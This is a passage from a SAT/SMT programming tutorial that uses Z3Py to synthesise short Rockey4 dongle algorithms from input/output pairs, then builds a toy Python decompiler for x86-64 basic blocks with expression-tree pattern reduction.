RY_CALCULATE1: (input) p1=48318 p2=6531 p3=51997 p4=30907 (output) p1=54849 p2=20601 p3=31271 p4=44794

p1/p2/p3/p4 are just other names for the A/B/C/D registers.

Now let's start with Z3. We will need to express the Rockey4 toy CPU in Z3Py (Z3 Python API) terms. It can be said that my Python script is divided into two parts:

• constraint definitions (like: output_1 should be n for input_1=m, a constant cannot be greater than 63, etc.);
• functions constructing the system of equations.

This piece of code defines a kind of structure consisting of 4 named 16-bit variables, each representing a register of our toy CPU:

Registers_State=Datatype ('Registers_State')
Registers_State.declare('cons',
    ('A', BitVecSort(16)),
    ('B', BitVecSort(16)),
    ('C', BitVecSort(16)),
    ('D', BitVecSort(16)))
Registers_State=Registers_State.create()

These enumerations define two new types (or sorts, in Z3's terminology):

Operation, (OP_MULT, OP_MINUS, OP_PLUS, OP_XOR, OP_OR, OP_AND) = EnumSort('Operation', ('OP_MULT', 'OP_MINUS', 'OP_PLUS', 'OP_XOR', 'OP_OR', 'OP_AND'))
Register, (A, B, C, D) = EnumSort('Register', ('A', 'B', 'C', 'D'))

This part is very important — it defines all the variables of our system of equations. op_step is the type of operation in an instruction. reg_or_constant is a selector between register and constant in the second argument: False if it's a register and True if it's a constant. reg_step is the destination register of the instruction. reg1_step and reg2_step are just the registers at arg1 and arg2. constant_step is the constant (in case it is used in the instruction instead of arg2).
op_step=[Const('op_step%s' % i, Operation) for i in range(STEPS)]
reg_or_constant_step=[Bool('reg_or_constant_step%s' % i) for i in range(STEPS)]
reg_step=[Const('reg_step%s' % i, Register) for i in range(STEPS)]
reg1_step=[Const('reg1_step%s' % i, Register) for i in range(STEPS)]
reg2_step=[Const('reg2_step%s' % i, Register) for i in range(STEPS)]
constant_step = [BitVec('constant_step%s' % i, 16) for i in range(STEPS)]

Adding constraints is very simple. Remember, I wrote that each constant cannot be larger than 63?

# according to the Rockey4 dongle manual, arg2 in the first and last instructions cannot be a constant
s.add (reg_or_constant_step[0]==False)
s.add (reg_or_constant_step[STEPS-1]==False)
...
for x in range(STEPS):
    s.add (constant_step[x]>=0, constant_step[x]<=63)

Known input/output values are added as constraints too. Now let's see how to construct our system of equations:

# Register, Registers_State -> int
def register_selector (register, input_registers):
    return If(register==A, Registers_State.A(input_registers),
           If(register==B, Registers_State.B(input_registers),
           If(register==C, Registers_State.C(input_registers),
           If(register==D, Registers_State.D(input_registers),
           0)))) # default

This function returns the corresponding register value from the structure. Needless to say, the code above is not executed: If() is a Z3Py function. The code only declares an expression, which will then be used in another. Expression declaration resembles a LISP-like PL in some way.

Here is another function, where register_selector() is used:

# Bool, Register, Registers_State, int -> int
def register_or_constant_selector (register_or_constant, register, input_registers, constant):
    return If(register_or_constant==False, register_selector(register, input_registers), constant)

The code here is never executed either. It only constructs one small piece of a very big expression. But for the sake of simplicity, one can think of all these functions as being called during the brute-force search, many times, at the fastest possible speed.
# Operation, Bool, Register, Register, Int, Registers_State -> int
def one_op (op, register_or_constant, reg1, reg2, constant, input_registers):
    arg1=register_selector(reg1, input_registers)
    arg2=register_or_constant_selector (register_or_constant, reg2, input_registers, constant)
    return If(op==OP_MULT, arg1*arg2,
           If(op==OP_MINUS, arg1-arg2,
           If(op==OP_PLUS, arg1+arg2,
           If(op==OP_XOR, arg1^arg2,
           If(op==OP_OR, arg1|arg2,
           If(op==OP_AND, arg1&arg2,
           0)))))) # default

Here is the expression describing each instruction. new_val will be assigned to the destination register, while all the other registers' values are copied from the input registers' state:

# Bool, Register, Operation, Register, Register, Int, Registers_State -> Registers_State
def one_step (register_or_constant, register_assigned_in_this_step, op, reg1, reg2, constant, input_registers):
    new_val=one_op(op, register_or_constant, reg1, reg2, constant, input_registers)
    return If (register_assigned_in_this_step==A,
               Registers_State.cons (new_val, Registers_State.B(input_registers), Registers_State.C(input_registers), Registers_State.D(input_registers)),
           If (register_assigned_in_this_step==B,
               Registers_State.cons (Registers_State.A(input_registers), new_val, Registers_State.C(input_registers), Registers_State.D(input_registers)),
           If (register_assigned_in_this_step==C,
               Registers_State.cons (Registers_State.A(input_registers), Registers_State.B(input_registers), new_val, Registers_State.D(input_registers)),
           If (register_assigned_in_this_step==D,
               Registers_State.cons (Registers_State.A(input_registers), Registers_State.B(input_registers), Registers_State.C(input_registers), new_val),
           Registers_State.cons(0,0,0,0))))) # default

This is the last function, describing a whole n-step program:

def program(input_registers, STEPS):
    cur_input=input_registers
    for x in range(STEPS):
        cur_input=one_step (reg_or_constant_step[x], reg_step[x], op_step[x], reg1_step[x], reg2_step[x], constant_step[x], cur_input)
    return cur_input
Again, for the sake of simplicity, it can be said that Z3 will now try each possible combination of registers/operations/constants against this expression to find one which satisfies all the input/output pairs. That sounds absurd, but it is close to reality: SAT/SMT solvers indeed try them all. The trick is to prune the search tree as early as possible, so that it runs in some reasonable time — and this is the hardest problem for solvers.

Now let's start with a very simple 3-step algorithm: B=A^D, C=D*D, D=A*C. Please note: register A is left unchanged. I programmed the Rockey4 dongle with the algorithm, and the recorded algorithm outputs are:

RY_CALCULATE1: (input) p1=8803 p2=59946 p3=36002 p4=44743 (output) p1=8803 p2=36004 p3=7857 p4=24691
RY_CALCULATE1: (input) p1=5814 p2=55512 p3=52155 p4=55813 (output) p1=5814 p2=52403 p3=33817 p4=4038
RY_CALCULATE1: (input) p1=25206 p2=2097 p3=55906 p4=22705 (output) p1=25206 p2=15047 p3=10849 p4=43702
RY_CALCULATE1: (input) p1=10044 p2=14647 p3=27923 p4=7325 (output) p1=10044 p2=15265 p3=47177 p4=20508
RY_CALCULATE1: (input) p1=15267 p2=2690 p3=47355 p4=56073 (output) p1=15267 p2=57514 p3=26193 p4=53395

It took about one second and only the 5 pairs above to find the algorithm (on my quad-core Xeon E3-1220 3.1 GHz; the Z3 solver, however, works in single-thread mode):

B = A ^ D
C = D * D
D = C * A

Note the last instruction: the C and A registers are swapped compared to the version I wrote by hand. But of course, this instruction works in the same way, because multiplication is a commutative operation.

Now, if I try to find a 4-step program satisfying these values, my script will offer this:

B = A ^ D
C = D * D
D = A * C
A = A | A

...and that's really fun, because the last instruction does nothing to the value in register A; it's like a NOP43 — but still, the algorithm is correct for all the values given.
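The recovered program is easy to check outside the dongle with a few lines of Python (an illustration, not part of the original scripts). All arithmetic is modulo 2^16, matching the 16-bit registers, and instructions execute sequentially, so D=C*A already sees the new C:

```python
M = 0xFFFF  # 16-bit registers

def algo(A, B, C, D):
    # the algorithm recovered by Z3: B=A^D, C=D*D, D=C*A
    B = (A ^ D) & M
    C = (D * D) & M
    D = (C * A) & M
    return A, B, C, D

# first recorded input/output pair from the dongle:
assert algo(8803, 59946, 36002, 44743) == (8803, 36004, 7857, 24691)
```

Running it against the other four recorded pairs works the same way.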
Here is another, 5-step algorithm: B=B^D, C=A*22, A=B*19, A=A&42, D=B&C, and the values:

RY_CALCULATE1: (input) p1=61876 p2=28737 p3=28636 p4=50362 (output) p1=32 p2=46331 p3=50552 p4=33912
RY_CALCULATE1: (input) p1=46843 p2=43355 p3=39078 p4=24552 (output) p1=8 p2=63155 p3=47506 p4=45202
RY_CALCULATE1: (input) p1=22425 p2=51432 p3=40836 p4=14260 (output) p1=0 p2=65372 p3=34598 p4=34564
RY_CALCULATE1: (input) p1=44214 p2=45766 p3=19778 p4=59924 (output) p1=2 p2=22738 p3=55204 p4=20608
RY_CALCULATE1: (input) p1=27348 p2=49060 p3=31736 p4=59576 (output) p1=0 p2=22300 p3=11832 p4=1560

It took 37 seconds, and we've got:

B = D ^ B
C = A * 22
A = B * 19
A = A & 42
D = C & B

A=A&42 was correctly deduced (look at these five p1's at the output (assigned to the output A register): 32, 8, 0, 2, 0).

A 6-step algorithm A=A+B, B=C*13, D=D^A, C=C&A, D=D|B, A=A&B and the values:

RY_CALCULATE1: (input) p1=4110 p2=35411 p3=54308 p4=47077 (output) p1=32832 p2=50644 p3=36896 p4=60884
RY_CALCULATE1: (input) p1=12038 p2=7312 p3=39626 p4=47017 (output) p1=18434 p2=56386 p3=2690 p4=64639
RY_CALCULATE1: (input) p1=48763 p2=27663 p3=12485 p4=20563 (output) p1=10752 p2=31233 p3=8320 p4=31449
RY_CALCULATE1: (input) p1=33174 p2=38937 p3=54005 p4=38871 (output) p1=4129 p2=46705 p3=4261 p4=48761
RY_CALCULATE1: (input) p1=46587 p2=36275 p3=6090 p4=63976 (output) p1=258 p2=13634 p3=906 p4=48966

90 seconds, and we've got:

A = A + B
B = C * 13
D = D ^ A
D = B | D
C = C & A
A = B & A

But that was still simple. Some 6-step algorithms are not possible to find, for example: A=A^B, A=A*9, A=A^C, A=A*19, A=A^D, A=A&B. The solver worked too long (up to several hours), so I never even found out whether it is feasible at all.

6.2.1 Conclusion

This is in fact an exercise in program synthesis. Some short algorithms for tiny CPUs are really possible to find using such a small set of data. Of course it's still not possible to reveal some complex algorithm, but this method definitely should not be ignored.
43 No Operation

6.2.2 The files

Rockey4 dongle programmer and reader, the Rockey4 manual, the Z3Py script for finding algorithms, and the input/output pairs: https://github.com/dennis714/SAT_SMT_article/tree/master/pgm_synth/rockey_files .

6.2.3 Further work

Perhaps constructing a LISP-like S-expression could work better than a program for a toy-level CPU. It's also possible to start with smaller constants and then proceed to bigger ones. This is somewhat similar to increasing the password length in brute-force password cracking.

7 Toy decompiler

7.1 Introduction

A modern-day compiler is the product of hundreds of developer-years. At the same time, a toy compiler can be an exercise for a student for a week (or even a weekend). Likewise, a commercial decompiler like Hex-Rays can be extremely complex, while a toy decompiler like this one can be easy to understand and remake.

The following decompiler, written in Python, supports only short basic blocks, with no jumps. Memory is also not supported.

7.2 Data structure

Our toy decompiler will use just one single data structure, representing an expression tree.

Many programming textbooks have an example of conversion from Fahrenheit temperature to Celsius, using the following formula:

celsius = ((fahrenheit - 32) * 5) / 9

This expression can be represented as a tree:

            "/"
           /   \
         "*"    9
        /   \
      "-"    5
     /   \
  INPUT   32

How to store it in memory? We see here 3 types of nodes: 1) numbers (or values); 2) arithmetic operations; 3) symbols (like "INPUT").

Many developers with OOP44 in mind would create some kind of class. Other developers maybe would use a "variant type". I'll use the simplest possible way of representing this structure: a Python tuple. The first element of the tuple is a string: either "EXPR_OP" for an operation, "EXPR_SYMBOL" for a symbol, or "EXPR_VALUE" for a value. In the case of a symbol or value, the string is followed by it. In the case of an operation, the string is followed by other tuples. The node type and operation type are stored as plain strings — to make the debugging output easier to read.
There are constructors in our code, in the OOP sense:

44 Object-oriented programming

def create_val_expr (val):
    return ("EXPR_VALUE", val)

def create_symbol_expr (val):
    return ("EXPR_SYMBOL", val)

def create_binary_expr (op, op1, op2):
    return ("EXPR_OP", op, op1, op2)

There are also accessors:

def get_expr_type(e):
    return e[0]

def get_symbol (e):
    assert get_expr_type(e)=="EXPR_SYMBOL"
    return e[1]

def get_val (e):
    assert get_expr_type(e)=="EXPR_VALUE"
    return e[1]

def is_expr_op(e):
    return get_expr_type(e)=="EXPR_OP"

def get_op (e):
    assert is_expr_op(e)
    return e[1]

def get_op1 (e):
    assert is_expr_op(e)
    return e[2]

def get_op2 (e):
    assert is_expr_op(e)
    return e[3]

The temperature conversion expression we just saw will be represented as:

"EXPR_OP" "/"
    "EXPR_OP" "*"
        "EXPR_OP" "-"
            "EXPR_SYMBOL" "arg1"
            "EXPR_VALUE" 32
        "EXPR_VALUE" 5
    "EXPR_VALUE" 9

...or as a Python expression:

('EXPR_OP', '/', ('EXPR_OP', '*', ('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)), ('EXPR_VALUE', 5)), ('EXPR_VALUE', 9))

In fact, this is an AST45 in its simplest form. ASTs are used heavily in compilers.

45 Abstract syntax tree

7.3 Simple examples

Let's start with the simplest example:

mov rax, rdi
imul rax, rsi

At the start, these symbols are assigned to the registers: RAX=initial_RAX, RBX=initial_RBX, RDI=arg1, RSI=arg2, RDX=arg3, RCX=arg4.

When we handle the MOV instruction, we just copy the expression from RDI to RAX. When we handle the IMUL instruction, we create a new expression, multiplying the expressions from RAX and RSI and putting the result into RAX again.

I can feed this to the decompiler, and we will see how the registers' state changes through processing:

python td.py --show-registers --python-expr tests/mul.s
...
line=[mov rax, rdi]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_SYMBOL', 'arg1')
line=[imul rax, rsi]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2'))
...
result=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2'))

The IMUL instruction is mapped to the "*" string, and then a new expression is constructed in handle_binary_op(), which puts the result into RAX.

In this output, the data structures are dumped using the Python str() function, which does mostly the same as print(). The output is bulky, so we can turn off the Python-expression output and see how this internal data structure can be rendered neatly using our internal expr_to_string() function:

python td.py --show-registers tests/mul.s
...
line=[mov rax, rdi]
rcx=arg4
rsi=arg2
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=arg1
line=[imul rax, rsi]
rcx=arg4
rsi=arg2
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=(arg1 * arg2)
...
result=(arg1 * arg2)

A slightly more advanced example:

imul rdi, rsi
lea rax, [rdi+rdx]

The LEA instruction is treated just as ADD.

python td.py --show-registers --python-expr tests/mul_add.s
...
line=[imul rdi, rsi]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2'))
rax=('EXPR_SYMBOL', 'initial_RAX')
line=[lea rax, [rdi+rdx]]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2'))
rax=('EXPR_OP', '+', ('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2')), ('EXPR_SYMBOL', 'arg3'))
...
result=('EXPR_OP', '+', ('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_SYMBOL', 'arg2')), ('EXPR_SYMBOL', 'arg3'))

And again, let's see this expression dumped neatly:

python td.py --show-registers tests/mul_add.s
...
result=((arg1 * arg2) + arg3)

Now another example, where we use 2 input arguments:

imul rdi, rdi, 1234
imul rsi, rsi, 5678
lea rax, [rdi+rsi]

python td.py --show-registers --python-expr tests/mul_add3.s
...
line=[imul rdi, rdi, 1234]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 1234))
rax=('EXPR_SYMBOL', 'initial_RAX')
line=[imul rsi, rsi, 5678]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg2'), ('EXPR_VALUE', 5678))
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 1234))
rax=('EXPR_SYMBOL', 'initial_RAX')
line=[lea rax, [rdi+rsi]]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg2'), ('EXPR_VALUE', 5678))
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 1234))
rax=('EXPR_OP', '+', ('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 1234)), ('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg2'), ('EXPR_VALUE', 5678)))
...
result=('EXPR_OP', '+', ('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 1234)), ('EXPR_OP', '*', ('EXPR_SYMBOL', 'arg2'), ('EXPR_VALUE', 5678)))

...and now the neat output:

python td.py --show-registers tests/mul_add3.s
...
result=((arg1 * 1234) + (arg2 * 5678))

Now the temperature conversion program:

mov rax, rdi
sub rax, 32
imul rax, 5
mov rbx, 9
idiv rbx

You can see how the registers' state changes over execution (or rather parsing). Raw:

python td.py --show-registers --python-expr tests/fahr_to_celsius.s
...
line=[mov rax, rdi]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_SYMBOL', 'arg1')
line=[sub rax, 32]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32))
line=[imul rax, 5]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_SYMBOL', 'initial_RBX')
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_OP', '*', ('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)), ('EXPR_VALUE', 5))
line=[mov rbx, 9]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_VALUE', 9)
rdx=('EXPR_SYMBOL', 'arg3')
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_OP', '*', ('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)), ('EXPR_VALUE', 5))
line=[idiv rbx]
rcx=('EXPR_SYMBOL', 'arg4')
rsi=('EXPR_SYMBOL', 'arg2')
rbx=('EXPR_VALUE', 9)
rdx=('EXPR_OP', '%', ('EXPR_OP', '*', ('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)), ('EXPR_VALUE', 5)), ('EXPR_VALUE', 9))
rdi=('EXPR_SYMBOL', 'arg1')
rax=('EXPR_OP', '/', ('EXPR_OP', '*', ('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)), ('EXPR_VALUE', 5)), ('EXPR_VALUE', 9))
...
result=('EXPR_OP', '/', ('EXPR_OP', '*', ('EXPR_OP', '-', ('EXPR_SYMBOL', 'arg1'), ('EXPR_VALUE', 32)), ('EXPR_VALUE', 5)), ('EXPR_VALUE', 9))

Neat:

python td.py --show-registers tests/fahr_to_celsius.s
...
line=[mov rax, rdi]
rcx=arg4
rsi=arg2
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=arg1
line=[sub rax, 32]
rcx=arg4
rsi=arg2
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=(arg1 - 32)
line=[imul rax, 5]
rcx=arg4
rsi=arg2
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=((arg1 - 32) * 5)
line=[mov rbx, 9]
rcx=arg4
rsi=arg2
rbx=9
rdx=arg3
rdi=arg1
rax=((arg1 - 32) * 5)
line=[idiv rbx]
rcx=arg4
rsi=arg2
rbx=9
rdx=(((arg1 - 32) * 5) % 9)
rdi=arg1
rax=(((arg1 - 32) * 5) / 9)
...
result=(((arg1 - 32) * 5) / 9)

It is interesting to note that the IDIV instruction also calculates the remainder of the division, which is placed into the RDX register. It's not used here, but it is available for use. This is how the quotient and the remainder are stored in the registers:

def handle_unary_DIV_IDIV (registers, op1):
    op1_expr=register_or_number_in_string_to_expr (registers, op1)
    current_RAX=registers["rax"]
    registers["rax"]=create_binary_expr ("/", current_RAX, op1_expr)
    registers["rdx"]=create_binary_expr ("%", current_RAX, op1_expr)

Now this is the align2grain() function46:

; uint64_t align2grain (uint64_t i, uint64_t grain)
; return ((i + grain-1) & ~(grain-1));
; rdi=i
; rsi=grain
sub rsi, 1
add rdi, rsi
not rsi
and rdi, rsi
mov rax, rdi

46 Taken from https://docs.oracle.com/javase/specs/jvms/se6/html/Compiling.doc.html

...
line=[sub rsi, 1]
rcx=arg4
rsi=(arg2 - 1)
rbx=initial_RBX
rdx=arg3
rdi=arg1
rax=initial_RAX
line=[add rdi, rsi]
rcx=arg4
rsi=(arg2 - 1)
rbx=initial_RBX
rdx=arg3
rdi=(arg1 + (arg2 - 1))
rax=initial_RAX
line=[not rsi]
rcx=arg4
rsi=(~(arg2 - 1))
rbx=initial_RBX
rdx=arg3
rdi=(arg1 + (arg2 - 1))
rax=initial_RAX
line=[and rdi, rsi]
rcx=arg4
rsi=(~(arg2 - 1))
rbx=initial_RBX
rdx=arg3
rdi=((arg1 + (arg2 - 1)) & (~(arg2 - 1)))
rax=initial_RAX
line=[mov rax, rdi]
rcx=arg4
rsi=(~(arg2 - 1))
rbx=initial_RBX
rdx=arg3
rdi=((arg1 + (arg2 - 1)) & (~(arg2 - 1)))
rax=((arg1 + (arg2 - 1)) & (~(arg2 - 1)))
...
result=((arg1 + (arg2 - 1)) & (~(arg2 - 1)))
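The decompiled expression is easy to sanity-check in Python (a quick illustration, not from td.py): for a power-of-two grain, ((i + grain − 1) & ~(grain − 1)) rounds i up to the next multiple of grain:

```python
def align2grain(i, grain):
    # grain is assumed to be a power of two; the mask ~(grain-1)
    # clears the low bits after rounding up
    return (i + grain - 1) & ~(grain - 1)

assert align2grain(0, 16) == 0
assert align2grain(1, 16) == 16
assert align2grain(16, 16) == 16
assert align2grain(17, 16) == 32
```

This matches the expression the decompiler recovered from the five instructions above.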
7.4 Dealing with compiler optimizations

The following piece of code...

mov rax, rdi
add rax, rax

...will be transformed into the (arg1 + arg1) expression. It can be reduced to (arg1 * 2). Our toy decompiler can identify patterns like this and rewrite them.

# X+X -> X*2
def reduce_ADD1 (expr):
    if is_expr_op(expr) and get_op (expr)=="+" and get_op1 (expr)==get_op2 (expr):
        return dbg_print_reduced_expr ("reduce_ADD1", expr, create_binary_expr ("*", get_op1 (expr), create_val_expr (2)))
    return expr # no match

This function just tests whether the current node has the EXPR_OP type, the operation is "+", and both children are equal to each other. By the way, since our data structure is just a tuple of tuples, Python can compare them using the plain "==" operation. If the test succeeds, the current node is replaced with a new expression: we take one of the children, we construct a node of EXPR_VALUE type with the number 2 in it, and then we construct a node of EXPR_OP type with "*".

dbg_print_reduced_expr() serves solely debugging purposes — it just prints the old and the new (reduced) expressions.

The decompiler then traverses the expression tree recursively, in depth-first search fashion:

def reduce_step (e):
    if is_expr_op (e)==False:
        return e # expr isn't EXPR_OP, nothing to reduce (we don't reduce EXPR_SYMBOL and EXPR_VAL)
    if is_unary_op(get_op(e)):
        # recreate expr with reduced operand:
        return reducers(create_unary_expr (get_op(e), reduce_step (get_op1 (e))))
    else:
        # recreate expr with both reduced operands:
        return reducers(create_binary_expr (get_op(e), reduce_step (get_op1 (e)), reduce_step (get_op2 (e))))

...

# same as "return ...(reduce_MUL1 (reduce_ADD1 (reduce_ADD2 (... expr))))"
reducers=compose([
    ...
    reduce_ADD1,
    ...])

def reduce (e):
    print "going to reduce " + expr_to_string (e)
    new_expr=reduce_step(e)
    if new_expr==e:
        return new_expr # we are done here, expression can't be reduced further
    else:
        return reduce(new_expr) # reduced expr has been changed, so try to reduce it again

The reduction functions are called again and again, as long as the expression keeps changing. Now we run it:

python td.py tests/add1.s
...
going to reduce (arg1 + arg1)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
going to reduce (arg1 * 2)
result=(arg1 * 2)

So far so good; now what if we try this piece of code?

mov rax, rdi
add rax, rax
add rax, rax
add rax, rax

python td.py tests/add2.s
...
working out tests/add2.s
going to reduce (((arg1 + arg1) + (arg1 + arg1)) + ((arg1 + arg1) + (arg1 + arg1)))
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() ((arg1 * 2) + (arg1 * 2)) -> ((arg1 * 2) * 2)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() ((arg1 * 2) + (arg1 * 2)) -> ((arg1 * 2) * 2)
reduction in reduce_ADD1() (((arg1 * 2) * 2) + ((arg1 * 2) * 2)) -> (((arg1 * 2) * 2) * 2)
going to reduce (((arg1 * 2) * 2) * 2)
result=(((arg1 * 2) * 2) * 2)

This is correct, but too verbose. We would like to rewrite the (X*n)*m expression to X*(n*m), where n and m are numbers. We could do this by adding another function like reduce_ADD1(), but there is a much better option: we can build a matcher for trees. You can think of it as a regular expression matcher, but one that works over trees.
def bind_expr (key):
    return ("EXPR_WILDCARD", key)

def bind_value (key):
    return ("EXPR_WILDCARD_VALUE", key)

def match_EXPR_WILDCARD (expr, pattern):
    return {pattern[1] : expr} # return {key : expr}

def match_EXPR_WILDCARD_VALUE (expr, pattern):
    if get_expr_type (expr)!="EXPR_VALUE":
        return None
    return {pattern[1] : get_val(expr)} # return {key : value}

def is_commutative (op):
    return op in ["+", "*", "&", "|", "^"]

def match_two_ops (op1_expr, op1_pattern, op2_expr, op2_pattern):
    m1=match (op1_expr, op1_pattern)
    m2=match (op2_expr, op2_pattern)
    if m1==None or m2==None:
        return None # one of the matches for the operands returned None, so we do the same
    # join two dicts from both operands:
    rt={}
    rt.update(m1)
    rt.update(m2)
    return rt

def match_EXPR_OP (expr, pattern):
    if get_expr_type(expr)!=get_expr_type(pattern): # be sure both are EXPR_OP.
        return None
    if get_op (expr)!=get_op (pattern): # be sure the op types are the same.
        return None
    if (is_unary_op(get_op(expr))):
        # match unary expression.
        return match (get_op1 (expr), get_op1 (pattern))
    else:
        # match binary expression.
        # first try to match operands as is.
        m=match_two_ops (get_op1 (expr), get_op1 (pattern), get_op2 (expr), get_op2 (pattern))
        if m!=None:
            return m
        # if matching was unsuccessful, AND the operation is commutative, try also swapped operands.
        if is_commutative (get_op (expr))==False:
            return None
        return match_two_ops (get_op1 (expr), get_op2 (pattern), get_op2 (expr), get_op1 (pattern))

# returns dict in case of success, or None
def match (expr, pattern):
    t=get_expr_type(pattern)
    if t=="EXPR_WILDCARD":
        return match_EXPR_WILDCARD (expr, pattern)
    elif t=="EXPR_WILDCARD_VALUE":
        return match_EXPR_WILDCARD_VALUE (expr, pattern)
    elif t=="EXPR_SYMBOL":
        if expr==pattern:
            return {}
        else:
            return None
    elif t=="EXPR_VALUE":
        if expr==pattern:
            return {}
        else:
            return None
    elif t=="EXPR_OP":
        return match_EXPR_OP (expr, pattern)
    else:
        raise AssertionError

Now, how we will use it:

# (X*A)*B -> X*(A*B)
def reduce_MUL1 (expr):
    m=match (expr, create_binary_expr ("*",
        (create_binary_expr ("*", bind_expr ("X"), bind_value ("A"))),
        bind_value ("B")))
    if m==None:
        return expr # no match
    return dbg_print_reduced_expr ("reduce_MUL1", expr, create_binary_expr ("*",
        m["X"], # new op1
        create_val_expr (m["A"] * m["B"]))) # new op2

We take the input expression, and we also construct a pattern to be matched. The matcher works recursively over both expressions synchronously. The pattern is also an expression, but it can use two additional node types: EXPR_WILDCARD and EXPR_WILDCARD_VALUE. These nodes are supplied with keys (stored as strings). When the matcher encounters EXPR_WILDCARD in the pattern, it just stashes the current expression and will return it. If the matcher encounters EXPR_WILDCARD_VALUE, it does the same, but only if the current node has the EXPR_VALUE type. bind_expr() and bind_value() are functions which create nodes of these two types.

All this means the reduce_MUL1() function will search for an expression of the form (X*A)*B, where A and B are numbers. In all other cases, the reducing function returns the input expression untouched, so these reducing functions can be chained.

Whenever reduce_MUL1() encounters a (sub)expression we are interested in, it returns a dictionary with keys and expressions. Let's add a print m call somewhere before the return and rerun:

python td.py tests/add2.s
...
going to reduce (((arg1 + arg1) + (arg1 + arg1)) + ((arg1 + arg1) + (arg1 + arg1)))
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() ((arg1 * 2) + (arg1 * 2)) -> ((arg1 * 2) * 2)
{'A': 2, 'X': ('EXPR_SYMBOL', 'arg1'), 'B': 2}
reduction in reduce_MUL1() ((arg1 * 2) * 2) -> (arg1 * 4)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() (arg1 + arg1) -> (arg1 * 2)
reduction in reduce_ADD1() ((arg1 * 2) + (arg1 * 2)) -> ((arg1 * 2) * 2)
{'A': 2, 'X': ('EXPR_SYMBOL', 'arg1'), 'B': 2}
reduction in reduce_MUL1() ((arg1 * 2) * 2) -> (arg1 * 4)
reduction in reduce_ADD1() ((arg1 * 4) + (arg1 * 4)) -> ((arg1 * 4) * 2)
